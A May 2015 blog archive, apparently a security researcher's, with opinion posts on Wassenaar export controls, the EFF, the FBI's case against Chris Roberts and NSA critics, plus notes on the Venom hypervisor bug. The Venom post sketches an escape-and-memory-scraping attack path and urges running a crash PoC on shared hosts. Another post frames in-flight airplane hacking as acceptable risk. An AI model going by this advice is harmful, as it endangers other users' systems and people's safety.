Wednesday, May 27, 2015

Some notes about Wassenaar

So #wassenaar has infected your timeline for the past several days. I thought I'd explain what the big deal is.

What's a Wassenaar?


It's a town in Europe where in 1996 a total of 41 nations agreed to an arms control treaty. The name of the agreement, the Wassenaar Arrangement, comes from the town. The US, Europe, and Russia are part of the agreement. Africa, Middle East, and China are not.

The primary goal of the arrangement is anti-proliferation, stopping uranium enrichment and chemical weapons precursors. Another goal is to control conventional weapons, keeping them out of the hands of regimes that would use them against their own people, or to invade their neighbors.

Historically in cybersec, we've complained that Wassenaar classifies crypto as a munition. This allows the NSA to eavesdrop and decrypt messages in those countries. This does little to stop dictators from getting their hands on strong crypto, but does a lot to prevent dissidents in those countries from encrypting their messages. Perhaps more importantly, it requires us to jump through a lot of bureaucratic hoops to export computer products, because encryption is built-in to virtually everything.

Why has this become important recently?


Last year, Wassenaar added cyberweapons to the list. On May 20th, the United States Bureau of Industry and Security (BIS) proposed US rules to comply with the Wassenaar additions. They are currently accepting comments about these rules.

The proposed BIS rules go beyond the simpler Wassenaar rules, affecting a large number of cybersecurity products, and cybersecurity research. These rules further restrict anything that may be used to develop a cyberweapon, which therefore make a wide number of innocuous product export-restricted, such as editors and compilers.

It's not that these rules will necessarily block the export of legitimate products, but that it creates a huge bureaucracy that will apply the rules prejudicial and arbitrarily. It's easy to make mistakes -- and a mistake can cost a person 20 years in jail and $1 million. This will create a huge chilling effect even among those who don't intend to export anything.

What specific cyber-weapons is Wassenaar trying to restrict?


The arrangement added three categories of cyber-weapons.

The first is "intrusion malware". The specific example is malware sold by FinFisher to governments like Bahrain, which has been found on laptops of Bahraini activists living in Washington D.C.

The second is "intrusion exploits". These are tools, including what's known as "0-days", that exploit a bug or vulnerability in software in order to hack into a computer, usually without human intervention.

The third is "IP surveillance" products. These are tools, like those sold by Amesys, that monitor Internet backbones in a country, spy on citizen's activities, and try to discover everyone activists/dissents talk to.

Wassenaar includes both intrusion malware and intrusion exploits under the single designation "intrusion software", but while they are both related, they are significantly different from each other. The BIS rules clarifies this difference more.

Haven't I heard about 0-days/zero-days before?


The bulk of cyber-security research is into vulnerabilities, which are software bugs that hackers can exploit in order to break into computer. Over the last 15 years, the relentless pursuit of these vulnerabilities has made computers dramatically safer.

When such bugs are first discovered, before anybody else knows about them, they are known as 0-days. Almost always, researchers give those 0-days to the appropriate company so that they can fix the bug.

Sometimes, however, a researcher may sell the 0-day to the NSA, so that they can secretly hack into computers using a bug nobody knows about. Selling 0-days has been a big controversy in the community, especially since the Snowden affair.

It's perfectly legal for American researchers to sell 0-days to the Chinese government instead of the NSA -- which would presumably then use them to hack American computers. One goal of the Wassenaar agreement is to close this obvious loophole.

One of the controversial provisions of the export license is that companies/individuals may have to share their secret 0-days with the NSA in order to get a license.

Isn't stopping intrusion and surveillance software a good thing?


Maybe. Certainly companies like FinFisher and Amesys are evil, knowingly selling to corrupt governments that repress their people.

However, good and evil products are often indistinguishable from each other. The best way to secure your stuff is for you to attack yourself.

That means things like bug bounties that encourage people to find 0-days in your software, so that you can fix them before hackers (or the NSA) exploit them. That means scanning tools that hunt for any exploitable conditions in your computers, to find those bugs before hackers do. Likewise, companies use surveillance tools on their own networks (like intrusion prevention systems) to monitor activity and find hackers.

Thus, while Wasenaar targets evil products, they inadvertently catch the bulk of defensive products in their rules as well.

Isn't stopping intrusion and surveillance software a good thing? (part 2)


Maybe. Here's the thing, though: the cyberspace has no borders.

Normal arms control works because they are physical things. They require a huge industrial base to produce. Not only the weapons themselves, but the equipment and materials used to produce weapons can be tracked. Even if the bad guys sneak through the original weapons, they will still struggle to keep smuggling the parts needed to keep them working.

None of this argument applies to cyberspace. A single hacker working out of their mom's basement can create the next devastating 0-day. Right now, e-commerce sites block the IP addresses from restricted countries. But, those countries can simply call up their ambassador in an unblocked country in order to purchase a product.

That's not to say export controls would have no leverage. For example, these products usually require an abnormally high degree of training and technical support that can be tracked. However, the little good export controls provide is probably outweighed by the harm -- such as preventing dissidents in the affected countries from being able to defend themselves. We know they do little good know because we watch Bashar Al Assad brandish the latest iPhone that his wife picked up in Paris. Such restrictions may stop the little people in his country getting things -- but they won't stop him.

Isn't there an exception for open-source?


Yes and no. Wassenaar explicitly exempts open-source code in theory. That means you can publish your code to GitHub knowing that corrupt governments will use it, without getting in trouble with the law.

However, there are situations where this doesn't apply. When security researchers discover 0-day, they typically write a proof-of-concept exploit, then present their findings at the next conference. That means they have unpublished code on their laptop, code that they may make public later, but which is not yet technically open-source. If they travel outside the country, they have technically violated both the letter and the spirit of the export restrictions, and can go to jail for 20 years and be forced to pay a $1 million fine.

Thus, make sure you always commit your latest changes to GitHub before getting on a plane.

What's the deal with security research?


One of the most vocal groups in opposition to Wassenaar is security researchers. That's because they are under attack by a wide variety of proposals in the current administration's "War on Hackers".

Proposed changes to the anti-hacking law, the CFAA, would technically make security research into 0days illegal. Copyright law, the DMCA, is frequently exploited for the non-copyright purpose of suppressing researchers. The recent of State of Emergency declaration would allow the government to unilaterally seize a security researcher's assets if the government believed they helped Chinese hackers. And lastly, these proposed BIS rules would impose export restrictions on all security research.

Discovering vulnerabilities in products, especially products from prickly companies like Oracle and Microsoft, embarrasses them. They see the security researchers, rather than the hackers, as their primary threat. They put a lot of pressure on government to do something about those pesky researchers.

What's the penalty for improperly exporting something?


Nobody knows, because the BIS gets to arbitrarily impose penalties. They could decide to send you a warning letter, or they could decide to send you to jail for 20 years with a $1 million fine. It's described somewhat here.

It seems good that the BIS can decide to simply warn you if you make a mistake, but the opposite is true. Such warnings go to people who play along, such as by sharing their 0-days with the NSA. Harsher punishments go to those who stand up against the system.

That's been a frequent criticism of anti-hacking laws: their punishments are unreasonably severe, and meted out in a prejudicial and arbitrary fashion. Those who annoy the powerful are the ones who get punished most.

Why this anger toward privacy groups?


Because they got precisely what they asked for.

Privacy groups have long attacked companies like FinFisher and Amesys. They have pushed for regulations to stop these companies, sometimes explicitly for export restrictions. Now that these regulations are here, and their impact obvious, these privacy activists are complaining the rules go too far -- and that they aren't responsible.

But cybersecurity experts have long warned of this, specifically that good and bad products are technically indistinguishable. Privacy groups have ignored these warnings. A good example is this post from Privacy International where they consider, then reject, the warning.

The feuding between privacy/rights organizations and cybersecurity researchers predates the Wassenaar debate. For example, Chris Soghoian, the Principal Technologist at the ACLU, calls 0-day sellers "merchants of death". 0-day sellers in turn call Soghoian a "fascist" for his attack on their free speech rights.

Smarter organizations like the EFF have consistently warned that technical distinctions in regulations were nearly impossible. However, they still have championed the cause that "something must be done" about FinFisher and Amesys without taking a principled stand against government regulation -- at least not the same stand as cybersecurity researchers.

Are there other issues besides cybersecurity?


Yes. For example, only software used by corrupt governments is controlled. Software used to enforce copyright, or track users for advertising, is explicitly allowed. Likewise, far from restricting software that the NSA can use to spy on people, one of the provision suggests that the NSA should get a copy of the source code before an export license will be granted.

There's a couple First Amendment issues. Code is speech, and in many ways this restricts code (though open-source code is untouched by the rules). Separately, the way restrictions and punishments can be arbitrarily applied gives the government leeway to punish those who speak up.

Conclusion


The BIS proposal is not yet fixed in stone. The comment period ends July 20. You can submit comments here.

One thing to note is that the comments we want to make don't precisely match up with the questions they are asking. For example, they ask "How many additional license applications would your company be required to submit per year?" This has nothing to do with why people are up in arms over this proposal.

Tuesday, May 26, 2015

EFF and intrusion software regulation

To its credit, the EFF is better than a lot of other privacy groups like the ACLU or Privacy International. It at least acknowledges that regulating "evil" software can have unintended consequences on "good" software, that preventing corrupt governments from buying software also means blocking their dissidents from buying software to protect themselves. An example is this piece from several years ago that says:
"First and foremost, we want to make sure we do not leave activists with fewer tools than they already have. Parliament must be mindful of legislation just based on types of technology because broadly written regulations could have a net negative effect on the availability of many general-purpose technologies and could easily harm very people that the regulations are trying to protect."
But that does not stop the EFF from proposing such regulations.

In that same piece, the EFF first proposes rules for transparency. This will not stop the bad companies, but will be a burden on the legitimate companies that have no interesting in dealing with corrupt governments anyway. Most of this stuff is sold by small companies, like FinFisher, who focus on the "corrupt regime" market. They would not be embarrassed by transparency -- indeed it was just serve as advertising. These pieces outing FinFisher, Amesys, Area SpA, and Trovicor are essentially advertisements that help their business.

The EFF next proposes rules for know your customer. This is so burdensome as to effectively be a ban. Products are sold through middlemen, though distributers and resellers. Companies wish they could know their customer, because they'd like to cut out the middleman. But at the same time, the middleman provides access to markets they could not otherwise touch. A know your customer requirement would break most company's marketing and sales channels.

There's no satisfactory way to know a customer. If a small ISP in one of those countries wants to buy my "intrusion prevention" product, in order to defend against intrusion from their own government or the NSA, there is no way I can sell it to them.  Intrusion prevention products do deep-packet that is indistinguishable from surveillance products. There is no way they can prove to me that they aren't a front for a government agency that wants to buy my product for surveillance.

The EFF says knowing customers is easy, because companies have to be able to do it already for the Foreign Corrupt Practices Act. This is a misunderstanding -- companies largely bypass that Act by selling through middlemen. India is a huge, but corrupt market. Everyone sells products to India. Nobody does it directly, through, because large sales always require bribes. Therefore, they sell through middlemen, washing their hands clean of corrupt practices. Companies don't always do this intentionally -- if they write off a country because it's too corrupt, some middleman somewhere will buy product and import it to that country anyway. (This has happened to me -- I scan the entire Internet and sometimes find my own product that countries aren't supposed to have).


The point is that the EFF does not stand for the principle that such regulations are bad. Instead, they stand for the principle that there should be proper regulation. This is like getting only a little bit pregnant -- it's not realistic. It's at least better than other privacy organizations, but it's still far from the ideal. The EFF's call for regulation is at least partly responsible for the bad regulations that we get.


Monday, May 25, 2015

This is how we get ants

Today's Wassenaar proposal to limit 0days -- and thereby virtually all cybersecurity products -- is partly the result of lobbying by the ACLU and EFF. The principle technologist of the ACLU called 0day sellers "merchants of death". The EFF called for 0day sales to governments to be the center of any policy debate on cybersecurity.

Yet, they deny responsibility for Wassenaar -- because the regulations go too far, and appear to restrict virtually all cybersecurity software and any free-speech on the topic. These groups now back off and claim they never called for 0day restrictions in the first place.

For example, when the EFF said "exploit sales should be key point in cybersecurity debate", nowhere in the article does it explicitly call for a ban on exploit sales.  Their focus was on limiting the actions of the NSA in buying exploits, not so much those who would sell the exploits. 

This is true, but only technically. There's no conceivable situation where the US Government would unilaterally disarm itself of cyberweapons while allowing everyone else to purchase them. It's also not conceivable that when you've put that much work into calling 0days evil and unethical, that a reasonable person wouldn't interpret this as a call to ban them. If you say the issue of governments (plural, not just the US) buying 0days should be at the center of policy debates, that means Wassenaar -- the primary international arrangement for arms control.

But more importantly, the EFF never clarified its remarks. After the EFF published the document, the cybersecurity community quickly responded. Critics pointed out that the EFF was implicitly calling for a ban on 0day. The EFF responded by pointing out the technicality that their call for regulation wasn't explicit. They did not respond by publishing a document explicitly supporting 0day.

That's likely to continue to be the case. The EFF is going to publish a response to the US Wassenaar proposals. While the EFF may point out that Wassenaar goes too far, the EFF is unlikely to defend the rights of 0day coders. The EFF may tacitly agree that proper 0day restrictions are a good thing -- just deny that the currently proposed restrictions are proper.

The debate between researchers and the EFF/ACLU has raged for three years now. The EFF/ACLU can end this debate at any time by publishing an official document in support of 0day research. Until that happens, the only reasonable way to interpret their position (as demonstrated in the above link) is that they want 0day bans.

I point this out because this is how you get totalitarianism. Strident populism leads to regulation. Each one looks good when viewed in isolation, but there's always unexpected consequences. Populists deny they are responsible for those unintended consequences -- but they are. 0days are just speech and standard cybersecurity practice. There's no way to split the baby, to separate out the bad stuff you want to prevent without also limiting good speech and good cybersecurity products. The current attempt by the EFF to split the baby just won't work. If the EFF were serious about principle instead of populism, the only tenable position is an absolute support for free-speech, coder's rights, and cybersecurity research -- and thus absolute support for 0day.


Saturday, May 16, 2015

Our Lord of the Flies moment

In its war on researchers, the FBI doesn't have to imprison us. Merely opening an investigation into a researcher is enough to scare away investors and bankrupt their company, which is what happened last week with Chris Roberts. The scary thing about this process is that the FBI has all the credibility, and the researcher none -- even among other researchers. After hearing only one side of the story, the FBI's side, cybersecurity researchers quickly turned on their own, condemning Chris Roberts for endangering lives by taking control of an airplane.


As reported by Kim Zetter at Wired, though, Roberts denies the FBI's allegations. He claims his comments were taken out of context, and that on the subject of taking control a plane, it was in fact a simulator not a real airplane.

I don't know which side is telling the truth, of course. I'm not going to defend Chris Roberts in the face of strong evidence of his guilt. But at the same time, I demand real evidence of his guilt before I condemn him. I'm not going to take the FBI's word for it.

We know how things get distorted. Security researchers are notoriously misunderstood. To the average person, what we say is all magic technobabble anyway. They find this witchcraft threatening, so when we say we "could" do something, it's interpreted as a threat that we "would" do something, or even that we "have" done something. Important exculpatory details, like "I hacked a simulation", get lost in all the technobabble.

Likewise, the FBI is notoriously dishonest. Until last year, they forbad audio/visual recording of interviews, preferring instead to take notes. This inshrines any misunderstandings into official record. The FBI has long abused this, such as for threatening people to inform on friends. It is unlikely the FBI had the technical understanding to understand what Chris Roberts said. It's likely they willfully misunderstood him in order to justify a search warrant.

There is a war on researchers. What we do embarrasses the powerful. They will use any means possible to stop us, such as using the DMCA to suppress publication of research, or using the CFAA to imprison researchers. Criminal prosecution is so one sided that it rarely gets that far. Instead, merely the threat of prosecution ruins lives, getting people fired or bankrupted.

When they come for us, the narrative will never be on our side. They will have constructed a story that makes us look very bad indeed. It's scary how easily the FBI convict people in the press. They have great leeway to concoct any story they want. Journalists then report the FBI's allegations as fact. The targets, who need to remain silent lest their words are used against them, can do little to defend themselves. It's like how in the Matt Dehart case, the FBI alleges child pornography. But when you look into the details, it's nothing of the sort. The mere taint of this makes people run from supporting Dehart. Similarly with Chris Roberts, the FBI wove a tale of endangering an airplane, based on no evidence, and everyone ran from him.

We need to stand together on or fall alone. No, this doesn't mean ignoring malfeasance on our side. But it does mean that, absent clear evidence of guilt, that we stand with our fellow researchers. We shouldn't go all Lord of the Flies on the accused, eagerly devouring Piggy because we are so relieved it wasn't us.



P.S. Alex Stamos is awesome, don't let my bitch slapping of him make you believe otherwise.

Friday, May 15, 2015

Those expressing moral outrage probably can't do math

Many are discussing the FBI document where Chris Roberts ("the airplane hacker") claimed to an FBI agent that at one point, he hacked the plane's controls and caused the plane to climb sideways. The discussion hasn't elevated itself above the level of anti-vaxxers.

It's almost certain that the FBI's account of events is not accurate. The technical details are garbled in the affidavit. The FBI is notorious for hearing what they want to hear from a subject, which is why for years their policy has been to forbid recording devices during interrogations. If they need Roberts to have said "I hacked a plane" in order to get a search warrant, then that's what their notes will say. It's like cops who will yank the collar of a drug sniffing dog in order to "trigger" on drugs so that they have an excuse to search the car.

Also, security researchers are notorious for being misunderstood. Whenever we make innocent statements about what we "could" do, others often interpret this either as a threat or a statement of what we already have done.

Assuming this scenario is true, that Roberts did indeed control the plane briefly, many claim that this is especially reprehensible because it endangered lives. That's the wrong way of thinking about it. Yes, it would be wrong because it means accessing computers without permission, but the "endangered lives" component doesn't necessarily make things worse.

Many operate under the principle that you can't put a price on a human life. That is false, provably so. If you take your children with you to the store, instead of paying the neighbor $10 to babysit them, then you've implicitly put a price on your children's lives. Traffic accidents near the home are the leading cause of death for children. Driving to the store is a vastly more dangerous than leaving the kids at home, so you've priced that danger around $10.

Likewise, society has limited resources. Every dollar spent on airline safety has to come from somewhere, such as from AIDS research. With current spending, society is effectively saying that airline passenger lives are worth more than AIDS victims.

Does pentesting an airplane put passenger lives in danger? Maybe. But then so does leaving airplane vulnerabilities untested, which is the current approach. I don't know which one is worse -- but I do know that your argument is wrong when you claim that endangering planes is unthinkable. It is thinkable, and we should be thinking about it. We should be doing the math to measure the risk, pricing each of the alternatives.

It's like whistleblowers. The intelligence community hides illegal mass surveillance programs from the American public because it would be unthinkable to endanger people's lives. The reality is that the danger from the programs is worse, and when revealed by whistleblowers, nothing bad happens.

The same is true here. Airlines assure us that planes are safe and cannot be hacked -- while simultaneously saying it's too dangerous for us to try hacking them. Both claims cannot be true, so we know something fishy is going on. The only way to pierce this bubble and find out the truth is to do something the airlines don't want, such as whistleblowing or live pentesting.

The systems are built to be reset and manually overridden in-flight. Hacking past the entertainment system to prove one could control the airplane introduces only a tiny danger to the lives of those on-board. Conversely, the current "security through obscurity" stance of the airlines and FAA is an enormous danger. Deliberately crashing a plane just to prove it's possible would of course be unthinkable. But, running a tiny risk of crashing the plane, in order to prove it's possible, probably will harm nobody. If never having a plane crash due to hacking is your goal, then a live test on a plane during flight is a better way of doing this than the current official polices of keeping everything secret. The supposed "unthinkable" option of live pentest is still (probably) less dangerous than the "thinkable" options.

I'm not advocating anyone do it, of course. There are still better options, such as hacking the system once the plane is on the ground. My point is only that it's not an unthinkable danger. Those claiming it is haven't measure the dangers and alternatives.

The same is true of all security research. Those outside the industry believe in security-through-obscurity, that if only they can keep details hidden and pentesters away from computers, then they will be safe. We inside the community believe the opposite, in Kerckhoff's Principle of openness, and that the only trustworthy systems are those which have been thoroughly attacked by pentesters. There is a short term cost of releasing vulns in Adobe Flash, because hackers will use them. But the long term benefit is that this leads to a more secure Flash, and better alternatives like HTML5. If you can't hack planes in-flight, then what you are effectively saying is that our believe in Kerckhoff's Principle is wrong.


Each year, people die (or get permanently damaged) from vaccines. But we do vaccines anyway because we are rational creatures who can do math, and can see that the benefits of vaccines are a million to one times greater than the dangers. We look down on the anti-vaxxers who rely upon "herd immunity" and the fact the rest of us put our children through danger in order to protect their own. We should apply that same rationality to airline safety. If you think pentesting live airplanes is unthinkable, then you should similarly be able to do math and prove it, rather than rely upon irrational moral outrage.

I'm not arguing hacking airplanes mid-flight is a good idea. I'm simply pointing out it's a matter of math, not outrage.

Thursday, May 14, 2015

Revolutionaries vs. Lawyers

I am not a lawyer; I am a revolutionary. I mention this in response to Volokh posts [1, 2] on whether the First Amendment protects filming police. It doesn't -- it's an obvious stretch, and relies upon concepts like a protected "journalist" class who enjoys rights denied to the common person. Instead, the Ninth Amendment, combined with the Declaration of Independence, is what makes filming police a right.

The Ninth Amendment simply says the people have more rights than those enumerated by the Bill of Rights. There are two ways of reading this. Some lawyers take the narrow view, that this doesn't confer any additional rights, but is just a hint on how to read the Constitution. Some take a more expansive view, that there are a vast number of human rights out there, waiting to be discovered. For example, some wanted to use the Ninth Amendment to insist "abortion" was a human right in Roe v. Wade. Generally, lawyers take the narrow view, because the expansive view becomes ultimately unworkable when everything is a potential "right".

I'm not a lawyer, but a revolutionary. For me, rights come not from the Constitution. Bill of Rights, or Supreme Court decision. They come from the Declaration of Independence, the "natural rights" assertion, but also things like the following phrase used to justify the colony's revolution:
...when a long train of abuses and usurpations, pursuing invariably the same Object evinces a design to reduce them [the people] under absolute Despotism, it is their right, it is their duty, to throw off such Government...
The state inevitably strives to protect its privilege and power at the expense of the people. The Bill of Rights exists to check this -- so that we don't need to resort to revolution every few decades. The First Amendment protects free speech not because this is a good thing, but because it's the sort of the thing the state wants to suppress to protect itself.

In this context, therefore, abortion isn't a "right". Abortion neither helps nor harms the despot's power. Whether or not it's a good thing, whether it should be legal, or even whether the constitution should mention abortion, isn't the issue. The only issue here is how it relates to government power.

Thus, we know that "recording police" is a right under the Declaration of Independence. The police want to suppress it, because it challenges their despotism. We've seen this in the last year, as films of police malfeasance has led to numerous protests around the country. If filming the police were illegal in the United States, this would be an usurpation that would justify revolt.

Everyone knows this, so they struggle to fit it within the constitution. In the article above, a judge uses fancy rhetoric to try to shoehorn it into the First Amendment. I suggest they stop resisting the Ninth and use that instead. They don't have to accept an infinite number of "rights" in order to use those clearly described in the Declaration of Independence. The courts should simply say filming police helps us resist despots, and is therefore protected by the Ninth Amendment channeling the Declaration of Independence.

The same sort of argument happens with the Fourth Amendment right to privacy. The current legal climate talks about a reasonable expectation of privacy. This is wrong. The correct reasoning should start with a reasonable expectation of abuse by a despot.

Under current reasoning about privacy, government can collect all phone records, credit card bills, and airline receipts -- without a warrant. That's because since this information is shared with a third party, the company you are doing business with, you don't have a "reasonable expectation of privacy".

Under my argument about the Ninth, this should change. We all know that a despot is likely to abuse these records to maintain their power. Therefore, in order to protect against a despot, the people have the right that this information should be accessible only with a warrant, and that all accesses by the government should be transparent to the public (none of this secret "parallel construction" nonsense).

We all know there is a problem here needing resolution. Cyberspace has put our "personal effects" in the cloud, where third parties have access to them, that we still want to be "private". We struggle with how that third party (like Facebook) might invade that privacy. We struggle with how the government might invade that privacy. It's a substantial enough change that I don't thing precedence guides us, not Katz, not Smith v Maryland. I think the only guidance comes from the founding documents. The current state of affairs means that cyberspace has made personal effects obsolete -- I don't think this is correct.

Lastly, this brings me to crypto backdoors. The government is angry because even if Apple were to help them, they still cannot decrypt your iPhone. The government wants Apple to put in a backdoor, giving the police a "Golden Key" that will decrypt any phone. The government reasonably argues that backdoors would only be used with a search warrant, and thus, government has the authority to enforce backdoors. The average citizen deserves the protection of the law against criminals who would use crypto to hide their evil deeds from the police. When an evil person has kidnapped, raped, and murdered your daughter, all data from their encrypted phone should be available to the police in order to convict them.

But here's the thing. In the modern, interconnected world, we can only organize a revolution against our despotic government if we can send backdoor-free messages among ourselves. This is unlikely to be much of a concern in the United States, of course, but it's a concern throughout the rest of the world, like Russia and China. The Arab Spring was a powerful demonstration of how modern technology mobilized the populace to force regime change. Despots with crypto backdoors would be able to prevent such things.

I use Russia/China here, but I shouldn't have to. Many argue that since America is free, and the government under the control of the people, that we operate under different rules than those other despotic countries. The Snowden revelations prove this wrong. Snowden revealed a secret, illegal, mass surveillance program that had been operating for six years under the auspices of all three branches (executive, legislative, judicial) and both Parties (Republican and Democrat). Thus, it is false that our government can be trusted with despotic powers. Instead, our government can only be trusted because we deny it despotic powers.

QED: the people have the right to backdoor-free crypto.

I write this because I often hang out with lawyers. They have a masterful command of all the legal decisions and precedent, such as the Katz decision on privacy. It's not that I disrespect their vast knowledge on the subject, or deny their reasoning is solid. It's that I just don't care. I'm a revolutionary. Cyberspace, 9/11, and the war on drugs has led to an alarming number of intolerable despotic usurpations. If you lawyer people believe nothing in the Constitution or Bill of Rights can prevent this, then it's our right, even our duty, to throw off the current system and institute one that can.

Wednesday, May 13, 2015

NSA: ad hominem is still a fallacy

An ad hominem attack is where, instead of refuting a person's arguments, you attack their character. It's a fallacy that enlightened people avoid. I point this out because of a The Intercept piece about how some of NSA's defenders have financial ties to the NSA. This is a fallacy.


The first rule of NSA club is don't talk about NSA club. The intelligence community frequently publishes rules to this effect to all their employees, contractors, and anybody else under their thumb. They don't want their people talking about the NSA, even in defense. Their preferred defense is lobbying politicians privately in back rooms. They hate having things out in the public. Or, when they do want something public, they want to control the messaging (they are control freaks). They don't want their supporters muddying the waters with conflicting messaging, even if it is all positive. What they fear most is bad supporters, the type that does more harm than good. Inevitably, some defender of the NSA is going to say "ragheads must die", and that'll be the one thing attackers will cherry pick to smear the NSA's reputation.

Thus, you can tell how close somebody is to the NSA by how much they talk about the NSA -- the closer to the NSA they are, the less they talk about it. That's how you know that I'm mostly an outsider -- if I actually had the close ties to the NSA that some people think I do, then I couldn't publish this blogpost.

Note that there are a few cases where this might not apply, like Michael Hayden (former head) and Stewart Baker (former chief lawyer). Presumably, these guys have such close ties with insiders that they can coordinate messaging. But they are exceptions, not the rule.


The idea of "conflict of interest" is a fallacy because it works both ways. You'd expect employees of the NSA to like the NSA. But at the same time, you'd expect that those who like the NSA would also seek a job at the NSA. Thus, it's likely they sincerely like the NSA, and not just because they are paid to do so.

This applies even to Edward Snowden himself. In an interview, he said of the NSA "These are good people trying to do hard work for good reasons". He went to work for the intelligence community because he believe in their mission, that they were good people. He leaked the information because he felt the NSA overstepped their bounds, not because the mission of spying for your country was wrong.

If the "conflict of interest" fallacy were correct, then it would apply to The Intercept as well, whose entire purpose is to fan the flames of outrage over the NSA. If the conflict of interest about NSA contractors is a matter of public concern, then so is the amount Glenn Greenwald is getting paid for his stash of Snowden secrets, and how much Snowden gets paid living in Russia.

The reality is this. Those who attack the NSA, like The Intercept, are probably sincere in their attacks. Likewise, those who defend the NSA are likely sincere in their defense.


As the book Too Kill a Mockingbird said, you don't truly know somebody until you've walked a mile in their shoes. Many defend the NSA simply because they've walked a mile in the NSA's shoes. I say this from my own personal perspective. True, I often attack the NSA, because I agree with Snowden that surveillance has gone too far. But at the same time, again like Snowden, I feel they've been unfairly demonized -- because I've seen them up close and personal. In the intelligence community, it's the NSA who takes civil rights seriously, and it's organizations like the DEA, ATF, and FBI that'll readily stomp on your rights. We should be hating these other organizations more than the NSA.

It's those like The Intercept who are the questionable bigots here. They make no attempt to see things from another point of view. As a technical expert, I know their stories based on Snowden leaks are often bunk -- exploited to trigger rage with little interest in understanding the truth.


Stewart Baker and Michael Hayden are fascist pieces of crap who want a police state. That doesn't mean their arguments are always invalid, though. They know a lot about the NSA. They are worth considering, even if wrong.
















Some brief technical notes on Venom

Like you, I was displeased by the lack of details on the "Venom" vulnerability, so I thought I'd write up what little I found.

The patch to the source code is here. Since the note references CVE-2015-3456, we know it's venom:
http://git.qemu.org/?p=qemu.git;a=commit;h=e907746266721f305d67bc0718795fedee2e824c

Looking up those terms, I find writeups, such as this one from RedHat:
https://securityblog.redhat.com/2015/05/13/venom-dont-get-bitten/

It comes down to a typical heap/stack buffer overflow (depending), where the attacker can write large amounts of data past the end of a buffer. Since this is the kernel, there are no protections like NX or ASLR. To exploit this, you'd likely need some knowledge of the host operating system.

The details look straightforward, which means a PoC (proof-of-concept exploit) should arrive by tomorrow. (Update: a PoC has arrived today here).

This is a hypervisor privilege escalation bug. To exploit this, you'd sign up with one of the zillions of VPS providers and get a Linux instance. You'd then, likely, replace the floppy driver in the Linux kernel with a custom driver that exploits this bug. You have root access to your own kernel, of course, which you are going to escalate to root access of the hypervisor.

People suggest adding an exploit to toolkits like Metasploit framework -- but I don't think it has a framework for running drivers. This would instead be more of a one-off.

Once you gained control of the host, you'd then of course gain access to any of the other instances. This would be a perfect bug for the NSA. Bitcoin wallets, RSA private keys, forum passwords, and the like are easily found searching raw memory. Once you've popped the host, reading memory of other hosted virtual machines is undetectable. Assuming the NSA had a program that they'd debugged over the years that looked for such stuff, for $100,000 they could buy a ton of $10 VPS instances around the world, then run the search. All sorts of great information would fall out of such an effort -- you'd probably make your money back from discovered Bitcoin alone.

I'm not sure how data centers are going to fix this, since they have to reboot the host systems to patch. Customers hate reboots -- many would rather suffer the danger rather than have their instance reboot. Some datacenters may be able to pause or migrate instances, which will make some customers happier.

By the way, once a PoC is released, you should probably add to your VM's startup scripts. It'll likely crash the host, bringing all the VMs down. That's a good thing -- better to crash the host than allow it to be exploited.

By the way, we in the security community are a bit offended by the exploit-sploitation by Crowdstrike (VENOM! With logo!!), but yea, it's still a great find a serious bug.